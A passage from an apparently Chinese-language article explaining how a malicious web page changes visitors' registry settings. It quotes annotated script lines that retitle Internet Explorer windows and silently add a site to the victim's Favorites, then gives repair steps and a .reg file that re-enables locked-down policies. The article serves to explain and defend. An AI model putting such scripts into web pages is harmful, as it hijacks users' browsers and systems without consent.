注：下面两行代码修改注册表，使受害者所有的IE窗口都加上以下的标题：“呜啦啦…”

　　Shl.RegWrite （"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "呜啦啦..."）;
　　Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "呜啦啦..."）;

　　注：到上面一行为止，完成了对受害者的注册表的所有修改！

　　注：下面代码用来将其网页增加到受害者的收藏夹中

　　var WF, Shor, loc;
　　WF = FSO.GetSpecialFolder（0）;
　　loc = WF + "\\Favorites";
　　if（!FSO.FolderExists（loc））
　　{loc = FSO.GetDriveName（WF） + \\Documents and Settings\\ + Net.UserName + "\\Favorites"; if（!FSO.FolderExists（loc））{return;}}

　　注：下面就是使其网页加入到你的收藏夹的具体代码

　　AddFavLnk（loc, "找到感觉www.findfeel.com", "http://www.findfeel.com"）;

　　由于代码很简单，又加了注释，相信你已经看明白是怎么回事了。那么如果不小心进入该网页，并且已经中招了该怎么办呢？别急，下面给你列出了解决的办法。

　　受害用户的修复方法：

　　1：对于Win9x用户，建议在电脑启动时按F8键，选择到MS-DOS方式下，使用Scanreg/restore命令来恢复以前备份的、正常的注册表。

　　2：对于Win2000用户，把以下内容copy下来，存为unlock.reg文件，选带命令行的安全模式，用命令regedit unlock.reg导入，如何，重启机器就OK了。

　　unlock.reg文件内容如下：

　　Windows Registry Editor Version 5.00
　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
　　"NoDriveTypeAutoRun"=dword:00000095
　　"NoRun"=hex:
　　"NoLogOff"=hex:
　　"NoDrives"=dword:00000000
　　"RestrictRun"=dword:00000000
　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
　　"DisableRegistryTools"=dword:00000000
　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
　　"DisableRegistryTools"=dword:00000000
　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
　　"Disabled"=dword:00000000
　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
　　"NoRealMode"=dword:00000000
　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]
　　"LegalNoticeCaption"=""
　　"LegalNoticeText"=""
　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
　　"Window Title"="IE浏览器"
　　[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
　　"Window Title"="IE浏览器"

　　以上是比较常见的修改浏览者注册表的现象，今天在浏览网页时，无意中来到某个个人网站，又遇到了以前没有碰到过的问题：